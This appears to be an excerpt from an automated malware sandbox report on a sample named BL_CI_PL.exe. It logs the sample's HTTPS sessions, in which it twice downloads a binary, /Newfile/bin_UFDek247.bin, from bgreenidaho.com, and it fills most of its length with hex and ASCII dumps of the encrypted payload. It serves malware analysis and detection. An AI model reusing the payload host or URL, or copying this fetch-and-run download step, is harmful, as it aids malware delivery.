                                                                                                                                                    2021-11-29 13:05:26 UTC148INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:05:26 UTC156INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


Session ID: 1
Source IP: 192.168.11.20
Source Port: 49842
Destination IP: 20.124.109.2
Destination Port: 443
Process: C:\Users\user\Desktop\BL_CI_PL.exe

Timestamp    kBytes transferred    Direction    Data
2021-11-29 13:11:05 UTC    163    OUT    GET /Newfile/bin_UFDek247.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: bgreenidaho.com
Cache-Control: no-cache
2021-11-29 13:11:06 UTC    164    IN    HTTP/1.1 200 OK
Date: Mon, 29 Nov 2021 13:11:06 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
Accept-Ranges: bytes
Content-Length: 167488
Connection: close
Content-Type: application/octet-stream
                                                                                                                                                    Data Ascii: l>X2WglDhvKXFr(77h%u=amhYed#5e;:"X..0U0o{#Blq[C7(@'i;#P'kE/WhDA"K\V;713POk{fjH~ @)f*##gq8m/0h4:,AO7PT2
                                                                                                                                                    2021-11-29 13:11:06 UTC250INData Raw: dc cf d1 bb 9b 53 27 e7 6a d2 9d a9 77 5e 8f 69 27 e9 cf 85 45 a6 df b5 f9 cb 1c 29 70 7c b6 29 e0 12 d6 a6 7e a5 00 89 26 be 7b f2 da 1a 49 7e e0 53 bb 5b 64 1a c7 c5 ec 68 7a cf c8 0b 9d 99 3c 50 70 23 2e d1 3a fc 4b a4 70 ad ce 1c ee 1a 5a cc ae ce 93 c2 a0 c9 d8 d3 d8 01 81 3f 92 21 82 42 f7 00 6f f1 ee 00 22 a3 06 a4 b3 cc 43 3a 9e 2f 63 d3 52 05 ff d2 e6 c4 94 97 9a a1 3d 56 d6 61 af 08 55 49 5e 42 fb c1 54 68 5e 6c ce 27 91 64 4c 83 bb 88 d6 6e 93 bc 17 ef 38 5a 31 c4 cf a9 8b c3 e8 66 8a 6f 11 43 10 6a 18 5e 45 19 fd 17 35 7e f3 54 bf ea e2 21 19 12 2d bd 29 44 5a 2e 9f 04 86 bc 4f 49 3f 9a 8c 6d ae 85 a0 54 7e 92 9d ff 2b 42 f4 45 72 42 11 04 1f 3e 57 a8 a7 e2 04 35 fc 20 78 19 ef 52 da d4 d9 22 e2 e5 ff 17 fb 70 ec d9 e2 a5 68 5c 53 c7 45 4e b3
                                                                                                                                                    Data Ascii: S'jw^i'E)p|)~&{I~S[dhz<Pp#.:KpZ?!Bo"C:/cR=VaUI^BTh^l'dLn8Z1foCj^E5~T!-)DZ.OI?mT~+BErB>W5 xR"ph\SEN
                                                                                                                                                    2021-11-29 13:11:06 UTC258INData Raw: 70 bb 5b 50 eb b8 4a 55 27 2d 00 43 f6 21 9b c0 3f 5f 08 94 b1 bf 3d 1d c7 d3 3d 1d e9 f5 ec a5 78 99 98 66 e7 04 52 f5 fb e0 6b 95 4a fd d4 37 f3 88 2d 6b 0d 74 9c 71 29 9a 78 48 a9 ca 0f 4a 28 b1 92 5f 7b ec 5d a4 52 1f c3 cd b7 1a 9b 64 db c0 17 9f 2a 1e 42 60 93 3b b9 cf c6 fb 2e e9 ee 2e ef 96 97 37 58 ee a3 12 07 0c 05 8c 1a 31 2c 95 c9 94 f4 ca d2 53 17 89 ba 81 27 92 b6 38 e7 0c 78 f8 d8 00 20 b2 07 1f eb 5a 9a 76 b9 30 0f 8e 1f b1 6f a4 e5 4f e0 c3 b7 07 5d 6a a7 82 9a 28 4b c2 b7 6a 3a e7 4f 8b 78 bc dc a2 99 86 ec 79 97 c6 fc 0a f4 ab 95 44 78 4e e9 7f 39 d4 f9 10 a7 68 4c f0 be 9b fa 4c 44 91 6e 8f 17 17 9e fa 89 22 75 89 22 5a 67 ba f6 5b 13 e5 57 de fd 56 9f 51 94 4b 68 fd 8a fd 03 09 0e 4e f5 b1 ac 8b 71 2a 63 00 a7 34 e4 90 02 4f 45 09 c4
                                                                                                                                                    Data Ascii: p[PJU'-C!?_==xfRkJ7-ktq)xHJ(_{]Rd*B`;..7X1,S'8x Zv0oO]j(Kj:OxyDxN9hLLDn"u"Zg[WVQKhNq*c4OE
                                                                                                                                                    2021-11-29 13:11:06 UTC265INData Raw: 2d 14 5c a0 88 2c 26 05 bf d4 1b 5c f7 6f 4d 51 f7 97 f8 1b 91 21 91 23 be ec 28 fb f7 55 0d 2c 54 35 97 b5 d8 80 cb 67 2d 96 76 27 5c 29 9b 0e 9e d7 30 af e6 c0 6d dc 28 39 c0 c2 43 75 9a 6d 0d d8 fe 1f 50 d0 fb c7 4a 8b 76 db 69 35 e8 e7 4d 4a aa 3b f6 83 95 58 e8 00 3a 3e 0f ce 8a f4 29 3b 21 07 f1 16 08 8f d1 65 b4 32 73 08 00 5e df 13 0f 4b 66 b7 33 d1 f8 b6 aa a4 89 12 85 73 47 6d a4 65 57 1a 95 20 c8 2c 39 52 8c 2c 49 b1 2e 74 81 b4 ad 82 a3 33 36 7d d0 50 27 bb 90 b4 31 30 1a ab 01 43 54 57 18 ee 8e 67 b4 2d 6f 07 7a f7 ec 84 6e 44 d7 e6 c2 5e d1 91 e1 96 1c d1 91 b1 d6 33 58 69 f7 bf 27 b9 e1 e9 c3 91 99 e9 56 c0 8a ef 60 13 e9 47 07 4d c7 63 69 38 32 77 7d c2 b1 95 2b a3 28 45 92 39 e0 88 78 3d a8 9b 1a cc f2 3f 43 b9 30 a7 b7 43 af 01 1e a5 e8
                                                                                                                                                    Data Ascii: -\,&\oMQ!#(U,T5g-v'\)0m(9CumPJvi5MJ;X:>);!e2s^Kf3sGmeW ,9R,I.t36}P'10CTWg-oznD^3Xi'V`GMci82w}+(E9x=?C0C
                                                                                                                                                    2021-11-29 13:11:06 UTC273INData Raw: 72 5b 90 44 65 8e 70 a6 f5 45 65 e3 64 29 97 e7 86 b3 d6 21 49 61 d6 41 f2 25 cf ff 87 be b8 cb 71 58 18 2b d8 aa 72 cc 0b 54 cc 85 16 98 ab 3c 57 56 3f ef 58 81 90 69 75 63 89 a4 65 57 91 fb 7a 8e 09 06 85 c9 d2 97 6f f2 9c 5b 95 00 cb a0 e5 64 a6 78 37 40 01 93 bc b0 c0 14 2b 7c 8f 3a 5f cf 09 d0 63 e7 6f 62 4a 7c 5f e5 60 ed 52 8c 81 a5 cd a4 99 b6 4d 0a 09 3a 1f d5 47 9e 51 70 26 c4 03 65 4a 62 5d 69 97 09 9e 01 81 78 28 e9 48 f7 4f d7 93 b2 46 f4 ad 5a d6 24 84 a0 73 28 ff 86 bc 54 b9 e6 ff ed 04 0f 7f 62 79 90 87 2d d5 3a 9b 34 57 10 80 c0 9d 29 08 5f 47 65 09 de 49 d8 31 b4 2a d3 31 4c 5c 70 34 9d 09 e1 16 70 15 85 3c 2d 2c 0c bd c6 72 bf af e2 87 fb f0 de 24 c5 0b 02 18 d8 8e cd c8 57 3f 6a fe fe 78 ce fc 52 34 5a 9d fb 1a e4 4c 17 89 83 44 aa 26
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:11:06 UTC281INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:11:06 UTC289INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:11:06 UTC297INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
                                                                                                                                                    2021-11-29 13:11:06 UTC304INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
                                                                                                                                                    2021-11-29 13:11:06 UTC312INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:11:06 UTC320INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.11.20 | 49845 | 20.124.109.2 | 443 | C:\Users\user\Desktop\BL_CI_PL.exe

Timestamp | kBytes transferred | Direction | Data
2021-11-29 13:11:15 UTC | 327 | OUT | GET /Newfile/bin_UFDek247.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: bgreenidaho.com
Cache-Control: no-cache
2021-11-29 13:11:15 UTC | 328 | IN | HTTP/1.1 200 OK
Date: Mon, 29 Nov 2021 13:11:15 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2021 09:03:01 GMT
Accept-Ranges: bytes
Content-Length: 167488
Connection: close
Content-Type: application/octet-stream
                                                                                                                                                    Data Ascii: r[DepEed)!IaA%qX+rT<WV?XiuceWzo[dx7@+|:_cobJ|_`RM:GQp&eJb]ix(HOFZ$s(Tby-:4W)_GeI1*1L\p4p<-,r$W?jxR4ZLD&
                                                                                                                                                    2021-11-29 13:11:15 UTC445INData Raw: 5c 0c a5 98 d0 d0 54 59 cb bb be 7e 18 89 2c 1c 93 c0 b7 24 91 eb 09 c8 e9 c9 b3 0c 54 70 e4 fa 6d b0 0e e4 ac 80 66 12 80 82 3b 85 b9 19 69 95 d4 08 90 16 d5 47 de 7d 7c f7 2b 30 f4 d2 6c 5c ed 61 de 29 01 86 da 14 a1 ef 0b c4 82 9f ba 86 52 74 80 b6 bc 83 d1 6e 54 c4 49 d1 94 cc f5 74 f0 d3 24 74 2d e5 23 36 b8 45 48 3f a8 e1 9b 65 9d 5e fa 8e 23 42 f9 1a dd dc dc cb c0 99 80 cd c1 18 e0 3c c6 04 02 eb f0 ca 5c 83 52 09 19 bd fa 4b 50 2c 26 8b 90 e1 51 7b 33 8a a6 84 6e 05 28 95 94 b4 17 c8 a4 fe 64 88 7d 5d b6 8d f9 1a bc d9 4c c8 63 ca 20 cf a3 18 7d c5 f6 58 a8 b9 87 a9 4a f8 07 bc 20 5c f6 1c 12 54 b2 52 d2 5e ab e5 9e 40 03 a9 02 4b 60 0a 06 0d 21 cd 43 36 8f c5 db 44 a7 7e 80 af 4f c6 70 ae 10 53 13 ea 16 09 64 8d 8f 84 0a 05 c1 36 19 2d 47 99 b9
                                                                                                                                                    Data Ascii: \TY~,$Tpmf;iG}|+0l\a)RtnTIt$t-#6EH?e^#B<\RKP,&Q{3n(d}]Lc }XJ \TR^@K`!C6D~OpSd6-G
                                                                                                                                                    2021-11-29 13:11:15 UTC453INData Raw: e8 ef 0b ca 5f b4 de 88 fe 11 09 a0 0b 67 e1 0a 04 80 80 1f 84 15 a5 18 ce a2 ac 07 db 7c a1 00 61 f9 e2 16 9b 09 02 52 4a 42 34 0d 69 5f 8e 88 ab ca 09 d2 0e e6 46 d2 7b 5c e6 c7 93 b9 ea 1a bb da df 61 9d ba 92 7f 39 73 5c ad 63 97 ef 83 b0 ae 44 ed 85 1e 00 53 78 ff ed 38 5a 52 27 da 53 60 4e ce b1 e1 d4 ec 11 0c ba 69 fa 67 40 71 82 ae 05 89 a6 02 5f c8 32 aa 75 c6 df 12 6b 07 2e 78 ba 0b 39 db 10 f4 89 2d e5 b6 1b ca f7 8e 48 a8 18 96 cf 7f d6 e0 52 4d 38 47 a8 dd 79 be 0e ca 5a ea 80 63 b3 87 0f 7c b8 34 0c c4 f0 f8 9e 95 80 34 14 18 74 10 49 a4 ec a4 7a ed 98 1b d3 65 eb 9b cc d5 56 66 94 f8 29 14 25 92 f8 b6 ff 28 85 6b f8 30 e1 13 d2 9d 2c ec e2 18 c9 e0 8b fd b9 2e f1 7b 3b 0f b2 10 bf 76 41 d2 dc 75 b6 a0 19 9f 4b b2 62 68 7c 5d 2b 70 ec c2 37
                                                                                                                                                    Data Ascii: _g|aRJB4i_F{\a9s\cDSx8ZR'S`Nig@q_2uk.x9-HRM8GyZc|44tIzeVf)%(k0,.{;vAuKbh|]+p7
                                                                                                                                                    2021-11-29 13:11:15 UTC461INData Raw: 03 61 ab b3 e6 13 ca ab 03 8f 95 5c 2e e3 b5 72 2e 99 4e 75 28 2d 6a e3 ac af 03 98 b0 de b0 12 92 04 54 d1 5b ab 26 4d 01 4e 47 1d 79 97 78 a6 1f bd 1f e5 30 d8 d9 2f 0c 9c 12 56 ed cb c6 a7 aa be de e8 6d 3b 39 eb ac d0 ad d5 46 89 fa e9 90 f3 61 c9 ff 06 de d3 14 27 15 60 12 31 c5 90 88 c5 ae 36 7a ef 73 6b 9b 32 ec 42 47 f0 2c 13 82 97 d4 a9 bc 91 4a fa 04 c1 b5 b4 26 f8 20 a7 c0 5f da 90 78 1c d4 6c 1c 2b b3 70 a9 58 78 14 cd 9b 75 d3 4d 1f 40 75 53 42 71 b8 70 72 53 9c d2 04 c2 0b aa 70 b7 42 19 87 70 c3 1c 82 4f fe bb 3e 74 bc 54 b5 c3 24 12 e0 88 92 03 65 7d 08 0d 58 82 98 db eb 22 3f f8 ee a1 bb 4e 34 be 55 da ca c5 61 2b c4 1e 4b 45 11 b9 e5 cd e3 bb 2c 14 17 7c b5 70 b9 18 05 fa 67 d4 b6 81 8e 2a e7 6d 85 ed fa 5c 7c 91 fa d7 81 70 4b 0f a4 42
                                                                                                                                                    Data Ascii: a\.r.Nu(-jT[&MNGyx0/Vm;9Fa'`16zsk2BG,J& _xl+pXxuM@uSBqprSpBpO>tT$e}X"?N4Ua+KE,|pg*m\|pKB
                                                                                                                                                    2021-11-29 13:11:15 UTC468INData Raw: 24 6b b9 9c 18 4a ed d6 92 c7 13 48 f9 66 09 7b eb eb 5d 94 b3 93 c5 79 7b df 15 70 58 ea 64 89 f2 20 9b e6 cb d7 17 09 f2 2e a4 6b 2e bf a8 cc 2f 74 a7 c2 b5 3d f1 57 86 3a f2 39 df 10 61 18 fa 5c 56 17 70 87 bd c2 92 5e da 97 ec 20 0a 03 20 98 cd b8 b3 87 55 81 3a 15 3a f4 97 6a 71 3d c8 da 12 24 30 45 63 23 87 4e fa 56 79 b3 32 94 95 91 76 e2 70 30 2c bd 86 4e b0 03 17 6d 76 4f 11 a6 18 28 41 d1 cc ba ee 83 13 08 ff 41 69 c7 5b 69 1e 4b 1f b3 35 5c 02 6e 38 d2 26 a0 e7 df b8 78 00 72 55 5e 54 11 42 bd f3 9e 34 f6 44 44 8c 33 f2 7d ae 52 22 4d 58 bc 1a 52 22 46 13 17 e6 77 82 3b 50 f0 7d de c7 ba 20 23 59 07 e9 9f 7e f1 55 2f 63 18 f8 18 78 2e fc bb a2 22 81 99 6c 58 d6 fb a7 99 3f 6a 25 7f 5e 0d c4 98 1c 23 05 1f 0b 5a 16 ea 1c d3 db e6 2e d6 f7 c3 2c
                                                                                                                                                    Data Ascii: $kJHf{]y{pXd .k./t=W:9a\Vp^ U::jq=$0Ec#NVy2vp0,NmvO(AAi[iK5\n8&xrU^TB4DD3}R"MXR"Fw;P} #Y~U/cx."lX?j%^#Z.,
                                                                                                                                                    2021-11-29 13:11:15 UTC476INData Raw: 70 2a 6b d0 cd 09 a4 bd 55 5a c6 69 3a 07 ea 10 a3 7b 72 ae f3 73 01 d3 49 6f fb e2 9c e0 4d a9 a7 c9 40 fb cc bc a9 8a 37 d5 cc 99 7b ed 9c f9 4b 87 c1 8e 15 c4 79 1f 01 3d 58 5b 37 4c 43 a7 2c f6 92 d4 da 5f a6 7e e8 3d d6 5b 61 4f e1 85 d8 e7 f6 b2 d7 0f 1c 00 6c 15 7d 47 5d 4c 51 ff 77 6a 6a cf 2d e8 59 6f 79 45 64 2f dc 7d 7d 76 3d 9b bd c5 ec 78 7d da 3c 5e af 0c c4 2c d7 f9 08 02 22 bf c7 de 68 0d 3c 78 87 62 8f aa 92 1e 1c cb 9f b1 aa 97 73 e8 d7 2f dc 2d 03 72 b6 09 dd b5 c4 1c 4b 5c 21 0e f7 af f9 19 2c 3d 06 4b a7 c6 fb 2a 50 7a c1 ab 08 0f 1b a1 b7 fa d2 25 a7 68 6c cf 24 3d de fd 38 31 ba 2f ce c8 cc 0e 4d fa 66 e5 2a 8f ce 44 7c 0e fe af 32 d5 d7 d7 5f d6 85 32 41 19 0e af 61 86 34 f0 82 7a e5 53 86 a2 14 ec 3d ba 5b b4 5a b3 95 bb 1c c0 fe
                                                                                                                                                    Data Ascii: p*kUZi:{rsIoM@7{Ky=X[7LC,_~=[aOl}G]LQwjj-YoyEd/}}v=x}<^,"h<xbs/-rK\!,=K*Pz%hl$=81/Mf*D|2_2Aa4zS=[Z
                                                                                                                                                    2021-11-29 13:11:15 UTC484INData Raw: e5 7e 68 7d 58 14 5b 59 d3 e0 53 00 e1 8c 06 04 b3 26 f5 28 e2 04 7f d7 c9 67 cf 98 35 da d6 5b 3b 34 4c bf 7a 0d 84 20 81 a9 38 b1 e0 a3 79 df 9c 6f 62 20 df 05 60 79 a1 a1 2c d1 2e 3a 6f e6 4b 4c 36 aa f6 a3 39 c1 68 82 08 ea 41 5c cd 27 93 8f f8 9f de 74 53 91 b3 be b0 63 3e a7 ff f5 a4 b4 48 1d 4a f7 29 83 4b 87 bb 23 80 f2 38 1b 4f b5 62 c2 96 3c 37 13 61 dc f0 8a 9b 7f 01 8d 1e cf d4 84 e8 0c 48 b9 57 1f cc 3e b4 74 1e c8 df 25 f3 8a c1 ba 6e fc 9e 7a df d4 11 bd 5c 26 9b 28 92 98 89 8e 7c b3 9e de 16 fc 82 72 14 b8 aa cf 94 6f 9a df d0 a8 f9 aa ab ea e7 da 27 4a 3f 76 af 49 62 7f a3 46 47 0b 8b b0 da 53 c9 d5 54 5f 26 46 e1 0d 52 16 71 95 11 13 bc a9 f2 15 f4 ac 34 83 08 b4 85 74 d0 c9 78 bc 4b e1 62 b6 2d bc 29 1a fe c3 f3 10 e9 5d 10 2b 22 c1 80
                                                                                                                                                    Data Ascii: ~h}X[YS&(g5[;4Lz 8yob `y,.:oKL69hA\'tSc>HJ)K#8Ob<7aHW>t%nz\&(|ro'J?vIbFGST_&FRq4txKb-)]+"


                                                                                                                                                    Code Manipulations

                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage


                                                                                                                                                    Memory Usage


                                                                                                                                                    High Level Behavior Distribution


                                                                                                                                                    Behavior


                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Start time:14:04:10
                                                                                                                                                    Start date:29/11/2021
                                                                                                                                                    Path:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    Wow64 process (32bit):true
